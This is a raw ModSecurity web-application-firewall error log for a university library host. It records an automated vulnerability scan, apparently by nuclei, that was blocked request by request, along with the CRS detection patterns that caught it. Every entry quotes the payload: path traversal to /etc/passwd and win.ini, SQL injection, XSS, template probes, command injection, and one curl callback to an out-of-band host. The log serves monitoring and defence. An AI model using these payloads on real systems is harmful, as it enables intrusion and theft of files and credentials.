[Tue Aug 29 11:39:12.453431 2023] [:error] [pid 1683] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAaT-vAAAAAb"]
[Tue Aug 29 11:39:12.486181 2023] [:error] [pid 1684] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12cMCo-f0AAAaULdoAAAAh"]
[Tue Aug 29 11:39:13.140081 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAXA9oYAAAAO"]
[Tue Aug 29 11:39:18.739877 2023] [:error] [pid 1686] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: nuclei%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO12dsCo-f0AAAaW4KAAAAAk"]
[Tue Aug 29 11:39:23.533211 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAXYiScAAAAG"]
[Tue Aug 29 11:39:36.528742 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAXYiWAAAAAG"]
[Tue Aug 29 11:39:48.045535 2023] [:error] [pid 1678] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAaO3doAAAAX"]
[Tue Aug 29 11:39:56.441499 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAagE58AAAAn"]
[Tue Aug 29 11:40:01.383380 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26gpjjy5wyiw5wsm.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12ocCo-f0AAAaHMeQAAAAE"]
[Tue Aug 29 11:40:07.403071 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAATZp7MAAAAf"]
[Tue Aug 29 11:40:07.404110 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAaHMegAAAAE"]
[Tue Aug 29 11:40:08.414194 2023] [:error] [pid 1525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO12qMCo-f0AAAX1n4YAAAAm"]
[Tue Aug 29 11:40:12.458534 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAATZp7oAAAAf"]
[Tue Aug 29 11:40:21.413611 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tcCo-f0AAAaXqvYAAAAl"]
[Tue Aug 29 11:40:22.566679 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAYf-GEAAAAD"]
[Tue Aug 29 11:40:32.434355 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAcjAjIAAAAw"]
[Tue Aug 29 11:40:33.411884 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAYf-HUAAAAD"]
[Tue Aug 29 11:40:36.469098 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAcbR@8AAAAv"]
[Tue Aug 29 11:40:37.377447 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAQSWmwAAAA0"]
[Tue Aug 29 11:40:39.504439 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcPiy4AAAAa"]
[Tue Aug 29 11:40:40.387386 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: # found within ARGS:username: {{username}}#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO12yMCo-f0AAAcYU3YAAAAp"]
[Tue Aug 29 11:40:44.447343 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAXbcOIAAAAL"]
[Tue Aug 29 11:40:44.620285 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAcVJQkAAAAB"]
[Tue Aug 29 11:40:46.410983 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAcPiz8AAAAa"]
[Tue Aug 29 11:40:50.360752 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAcbSAAAAAAv"]
[Tue Aug 29 11:40:50.409123 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAcjAkoAAAAw"]
[Tue Aug 29 11:40:53.613676 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbEcAAAAH"]
[Tue Aug 29 11:40:55.440558 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAcsLCQAAAAE"]
[Tue Aug 29 11:40:58.371731 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAaZ9k0AAAAo"]
[Tue Aug 29 11:40:58.404034 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAYf-LEAAAAD"]
[Tue Aug 29 11:40:58.427520 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAcjAl0AAAAw"]
